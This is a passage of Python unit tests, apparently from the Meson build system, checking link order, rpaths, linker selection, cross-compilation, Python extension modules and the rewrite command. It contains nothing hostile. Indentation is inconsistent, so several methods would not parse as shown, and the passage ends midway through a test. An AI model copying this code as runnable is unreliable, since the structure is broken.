@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
    @skipIfNoPkgconfig
    def test_usage_external_library(self):
        '''
        Test that uninstalled usage of an external library (from the system or
        PkgConfigDependency) works. On macOS, this workflow works out of the
        box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
        as LD_LIBRARY_PATH, etc, so this test is skipped.
        The system library is found with cc.find_library() and pkg-config deps.
        '''
        oldprefix = self.prefix
        # Install external library so we can find it
        testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
        # install into installdir without using DESTDIR
        installdir = self.installdir
        self.prefix = installdir
        self.init(testdir)
        self.prefix = oldprefix
        self.build()
        self.install(use_destdir=False)
        ## New builddir for the consumer
        self.new_builddir()
        env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
               'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
        testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
        # install into installdir without using DESTDIR
        self.prefix = self.installdir
        self.init(testdir, override_envvars=env)
        self.prefix = oldprefix
        self.build(override_envvars=env)
        # test uninstalled
        self.run_tests(override_envvars=env)
        if not is_osx():
            # Rest of the workflow only works on macOS
            return
        # test running after installation
        self.install(use_destdir=False)
        prog = os.path.join(self.installdir, 'bin', 'prog')
        self._run([prog])
        # The installed binary must not rely on @rpath lookups.
        out = self._run(['otool', '-L', prog])
        self.assertNotIn('@rpath', out)
        ## New builddir for testing that DESTDIR is not added to install_name
        self.new_builddir()
        # install into installdir with DESTDIR
        self.init(testdir, override_envvars=env)
        self.build(override_envvars=env)
        # test running after installation
        self.install(override_envvars=env)
        prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
        lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
        for f in prog, lib:
            out = self._run(['otool', '-L', f])
            # Ensure that the otool output does not contain self.installdir
            self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
curdir = os.getcwd()
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
    def test_compiler_libs_static_dedup(self):
        # Compiler-provided libraries (-ldl, -lm, ...) must not be repeated
        # on any single link line in the generated build.ninja.
        testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
        self.init(testdir)
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            lines = f.readlines()
        for lib in ('-ldl', '-lm', '-lc', '-lrt'):
            for line in lines:
                if lib not in line:
                    continue
                # Assert that the library occurs exactly once on this line:
                # splitting on it then yields exactly two pieces.
                self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
    """Configure with an 'identity' cross file whose host compiler wrapper
    matches the build machine, driven via a generated temporary cross file.
    """
    testdir = os.path.join(self.unit_test_dir, '61 identity cross')
    crossfile = tempfile.NamedTemporaryFile(mode='w')
    # Fix: the original never closed the NamedTemporaryFile, leaking the
    # open file (and the file itself, since delete-on-close never ran) for
    # the remainder of the process. Closing in a cleanup keeps the file
    # alive for init() below but guarantees disposal afterwards.
    self.addCleanup(crossfile.close)
    env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
    crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
    crossfile.flush()
    self.meson_cross_file = crossfile.name
    # TODO should someday be explicit about build platform only here
    self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
    """Install static libraries, then link a second project against them."""
    if is_cygwin():
        raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
    # Stage 1: build the libraries and install them into installdir.
    libdir = os.path.join(self.installdir, self.libdir)
    saved_prefix = self.prefix
    self.prefix = self.installdir
    self.init(os.path.join(self.unit_test_dir, '68 static link/lib'))
    self.install(use_destdir=False)
    # Stage 2: consume the installed libraries from a fresh build dir.
    self.new_builddir()
    self.prefix = saved_prefix
    link_args = ['-Dc_link_args=-L{}'.format(libdir),
                 '--fatal-meson-warnings']
    pkgconfig_env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
    self.init(os.path.join(self.unit_test_dir, '68 static link'),
              extra_args=link_args, override_envvars=pkgconfig_env)
    self.build()
    self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
    """Set the per-language linker env var to *name* and verify detection.

    :param check: executable that must exist for the test to be meaningful
    :param name: value to put into the <LANG>_ld environment variable
    :param lang: meson language id ('c', 'cpp', 'rust', ...)
    :param expected: linker id the detected compiler must report
    """
    if is_sunos():
        raise unittest.SkipTest('Solaris currently cannot override the linker.')
    if not shutil.which(check):
        raise unittest.SkipTest('Could not find {}.'.format(check))
    envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
    with mock.patch.dict(os.environ, {envvar: name}):
        env = get_fake_env()
        detect = getattr(env, 'detect_{}_compiler'.format(lang))
        comp = detect(MachineChoice.HOST)
        # Skip compilers that cannot be told to use a different linker
        # (rust always can, so it is exempt from the probe).
        if lang != 'rust' and comp.use_linker_args('foo') == []:
            raise unittest.SkipTest(
                'Compiler {} does not support using alternative linkers'.format(comp.id))
        self.assertEqual(comp.linker.id, expected)
# Per-language checks that the <LANG>_ld environment variable selects the
# expected linker; all delegate to _check_ld above.

def test_ld_environment_variable_bfd(self):
    self._check_ld('ld.bfd', 'bfd', 'c', 'GNU ld.bfd')

def test_ld_environment_variable_gold(self):
    self._check_ld('ld.gold', 'gold', 'c', 'GNU ld.gold')

def test_ld_environment_variable_lld(self):
    self._check_ld('ld.lld', 'lld', 'c', 'lld')

@skipIfNoExecutable('rustc')
def test_ld_environment_variable_rust(self):
    self._check_ld('ld.gold', 'gold', 'rust', 'GNU ld.gold')

def test_ld_environment_variable_cpp(self):
    self._check_ld('ld.gold', 'gold', 'cpp', 'GNU ld.gold')

def test_ld_environment_variable_objc(self):
    self._check_ld('ld.gold', 'gold', 'objc', 'GNU ld.gold')

def test_ld_environment_variable_objcpp(self):
    self._check_ld('ld.gold', 'gold', 'objcpp', 'GNU ld.gold')

@skipIfNoExecutable('gfortran')
def test_ld_environment_variable_fortran(self):
    self._check_ld('ld.gold', 'gold', 'fortran', 'GNU ld.gold')
def compute_sha256(self, filename):
    """Return the hex SHA-256 digest of the given file's contents."""
    with open(filename, 'rb') as f:
        contents = f.read()
    return hashlib.sha256(contents).hexdigest()
def test_wrap_with_file_url(self):
    # Wrap files whose source_url/patch_url use file:// URLs must work.
    # The .wrap file is generated on the fly so its hashes always match the
    # tarballs shipped with the test case.
    testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
    source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
    patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
    wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
    source_hash = self.compute_sha256(source_filename)
    patch_hash = self.compute_sha256(patch_filename)
    wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
    with open(wrap_filename, 'w') as f:
        f.write(wrap)
    self.init(testdir)
    self.build()
    self.run_tests()
    # Clean up: remove the unpacked subproject, the download cache and the
    # generated wrap file so the source tree is left pristine.
    windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
    windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
    os.unlink(wrap_filename)
def should_run_cross_arm_tests():
    """Truthy when an ARM cross-gcc is available and the host is not ARM."""
    cross_cc = shutil.which('arm-linux-gnueabihf-gcc')
    return cross_cc and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
    '''
    Tests that cross-compilation to Linux/ARM works
    '''

    def setUp(self):
        super().setUp()
        src_root = os.path.dirname(__file__)
        # Every test in this class configures with the Ubuntu armhf cross file.
        self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')

    def test_cflags_cross_environment_pollution(self):
        '''
        Test that the CFLAGS environment variable does not pollute the cross
        environment. This can't be an ordinary test case because we need to
        inspect the compiler database.
        '''
        testdir = os.path.join(self.common_test_dir, '3 static')
        self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
        compdb = self.get_compdb()
        self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])

    def test_cross_file_overrides_always_args(self):
        '''
        Test that $lang_args in cross files always override get_always_args().
        Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
        architectures such as some Android versions and Raspbian.
        https://github.com/mesonbuild/meson/issues/3049
        https://github.com/mesonbuild/meson/issues/3089
        '''
        testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
        self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
        self.init(testdir)
        compdb = self.get_compdb()
        # The -U from the cross file must come after the always-arg -D.
        self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
        self.build()

    def test_cross_libdir(self):
        # When cross compiling "libdir" should default to "lib"
        # rather than "lib/x86_64-linux-gnu" or something like that.
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        for i in self.introspect('--buildoptions'):
            if i['name'] == 'libdir':
                self.assertEqual(i['value'], 'lib')
                return
        self.assertTrue(False, 'Option libdir not in introspect data.')

    def test_std_remains(self):
        # C_std defined in project options must be in effect also when cross compiling.
        testdir = os.path.join(self.unit_test_dir, '51 noncross options')
        self.init(testdir)
        compdb = self.get_compdb()
        self.assertRegex(compdb[0]['command'], '-std=c99')
        self.build()

    @skipIfNoPkgconfig
    def test_pkg_config_option(self):
        # build.pkg_config_path targets the build machine, pkg_config_path
        # the host machine; both must be accepted while cross compiling.
        if not shutil.which('arm-linux-gnueabihf-pkg-config'):
            raise unittest.SkipTest('Cross-pkgconfig not found.')
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])
def should_run_cross_mingw_tests():
    """Truthy when a MinGW-w64 cross-gcc exists and the host is not Windows."""
    mingw_cc = shutil.which('x86_64-w64-mingw32-gcc')
    return mingw_cc and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
    '''
    Tests that cross-compilation to Windows/MinGW works
    '''

    def setUp(self):
        super().setUp()
        src_root = os.path.dirname(__file__)
        # Every test in this class configures with the MinGW-w64 cross file.
        self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')

    def test_exe_wrapper_behaviour(self):
        '''
        Test that an exe wrapper that isn't found doesn't cause compiler sanity
        checks and compiler checks to fail, but causes configure to fail if it
        requires running a cross-built executable (custom_target or run_target)
        and causes the tests to be skipped if they are run.
        '''
        testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
        # Configures, builds, and tests fine by default
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()
        os.mkdir(self.builddir)
        # Change cross file to use a non-existing exe_wrapper and it should fail
        self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
        # Force tracebacks so we can detect them properly
        env = {'MESON_FORCE_BACKTRACE': '1'}
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Drun-target=false',
                      inprocess=True,
                      override_envvars=env)
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.init(testdir, extra_args='-Dcustom-target=false',
                      inprocess=True,
                      override_envvars=env)
        # With both wrapper-requiring targets disabled configure must succeed.
        self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
                  override_envvars=env)
        self.build()
        with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
            # Must run in-process or we'll get a generic CalledProcessError
            self.run_tests(inprocess=True, override_envvars=env)

    @skipIfNoPkgconfig
    def test_cross_pkg_config_option(self):
        # Both the build-machine and host-machine pkg_config_path options
        # must be accepted while cross compiling.
        testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
        self.init(testdir, extra_args=[
            '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
            '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
        ])
class PythonTests(BasePlatformTests):
    '''
    Tests that verify compilation of python extension modules
    '''

    def test_versions(self):
        # Exercises the python module's interpreter lookup for a variety of
        # -Dpython= values against the '39 python extmodule' project.
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
        testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
        # No python version specified, this will use meson's python
        self.init(testdir)
        self.build()
        self.run_tests()
        self.wipe()
        # When specifying a known name, (python2 / python3) the module
        # will also try 'python' as a fallback and use it if the major
        # version matches
        try:
            self.init(testdir, extra_args=['-Dpython=python2'])
            self.build()
            self.run_tests()
        except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine,
            # if it is not, or the python headers can't be found, the test
            # will raise MESON_SKIP_TEST, we could check beforehand what version
            # of python is available, but it's a bit of a chicken and egg situation,
            # as that is the job of the module, so we just ask for forgiveness rather
            # than permission.
            pass
        self.wipe()
        for py in ('pypy', 'pypy3'):
            try:
                self.init(testdir, extra_args=['-Dpython=%s' % py])
            except unittest.SkipTest:
                # Same as above, pypy2 and pypy3 are not expected to be present
                # on the test system, the test project only raises in these cases
                continue
            # We have a pypy, this is expected to work
            self.build()
            self.run_tests()
            self.wipe()
        # The test is configured to error out with MESON_SKIP_TEST
        # in case it could not find python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=not-python'])
        self.wipe()
        # While dir is an external command on both Windows and Linux,
        # it certainly isn't python
        with self.assertRaises(unittest.SkipTest):
            self.init(testdir, extra_args=['-Dpython=dir'])
        self.wipe()
class RewriterTests(BasePlatformTests):
    """Tests for the 'meson rewrite' command (target/kwargs manipulation)."""

    def setUp(self):
        super().setUp()
        # Show full dict diffs on failure; the expected dicts below are large.
        self.maxDiff = None

    def prime(self, dirname):
        """Copy the named rewrite test project into the build dir."""
        copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)

    def rewrite_raw(self, directory, args):
        """Run the rewriter with *args* and return its JSON output.

        The rewriter prints its machine-readable result on stderr; an empty
        stderr yields {}. Raises SkipTest when the project requests it and
        CalledProcessError on any other non-zero exit.
        """
        if isinstance(args, str):
            args = [args]
        command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
        p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                           universal_newlines=True, timeout=60)
        print('STDOUT:')
        print(p.stdout)
        print('STDERR:')
        print(p.stderr)
        if p.returncode != 0:
            if 'MESON_SKIP_TEST' in p.stdout:
                raise unittest.SkipTest('Project requested skipping.')
            raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
        if not p.stderr:
            return {}
        return json.loads(p.stderr)

    def rewrite(self, directory, args):
        """Convenience wrapper: run rewrite_raw in 'command' mode."""
        if isinstance(args, str):
            args = [args]
        return self.rewrite_raw(directory, ['command'] + args)

    def test_target_source_list(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_add_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)
        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_add_sources_abs(self):
        # Absolute source paths must be stored relative to the target.
        self.prime('1 basic')
        abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
        add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
        inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
        self.rewrite(self.builddir, add)
        out = self.rewrite(self.builddir, inf)
        expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
        self.assertDictEqual(out, expected)

    def test_target_remove_sources(self):
        self.prime('1 basic')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
            }
        }
        self.assertDictEqual(out, expected)
        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, expected)

    def test_target_subdir(self):
        self.prime('2 subdirs')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
        self.assertDictEqual(list(out['target'].values())[0], expected)
        # Check the written file
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(list(out['target'].values())[0], expected)

    def test_target_remove(self):
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        # trivialprog0/1/9 were removed by rmTgt.json.
        expected = {
            'target': {
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_add(self):
        # Fix: method was misspelled 'test_tatrget_add'; unittest discovery
        # only requires the 'test' prefix, so renaming is safe.
        self.prime('1 basic')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {
            'target': {
                'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
                'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
                'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
                'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
                'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_remove_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        self.assertDictEqual(out, {})

    def test_target_add_subdir(self):
        self.prime('2 subdirs')
        self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
        self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)

    def test_target_source_sorting(self):
        # Sources must be kept in meson's "natural" sort order (path depth
        # first, then alphanumeric with number-aware comparison).
        self.prime('5 sorting')
        add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
        inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
        out = self.rewrite(self.builddir, add_json)
        out = self.rewrite(self.builddir, inf_json)
        expected = {
            'target': {
                'exe1@exe': {
                    'name': 'exe1',
                    'sources': [
                        'aaa/a/a1.c',
                        'aaa/b/b1.c',
                        'aaa/b/b2.c',
                        'aaa/f1.c',
                        'aaa/f2.c',
                        'aaa/f3.c',
                        'bbb/a/b1.c',
                        'bbb/b/b2.c',
                        'bbb/c1/b5.c',
                        'bbb/c2/b7.c',
                        'bbb/c10/b6.c',
                        'bbb/a4.c',
                        'bbb/b3.c',
                        'bbb/b4.c',
                        'bbb/b5.c',
                        'a1.c',
                        'a2.c',
                        'a3.c',
                        'a10.c',
                        'a20.c',
                        'a30.c',
                        'a100.c',
                        'a101.c',
                        'a110.c',
                        'a210.c',
                        'a666.c',
                        'b1.c',
                        'c2.c'
                    ]
                }
            }
        }
        self.assertDictEqual(out, expected)

    def test_target_same_name_skip(self):
        # With --skip, ambiguous same-named targets are reported but skipped.
        self.prime('4 same name targets')
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
        out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
        expected = {'name': 'myExe', 'sources': ['main.cpp']}
        self.assertEqual(len(out['target']), 2)
        for val in out['target'].values():
            self.assertDictEqual(expected, val)

    def test_kwargs_info(self):
        self.prime('3 kwargs')
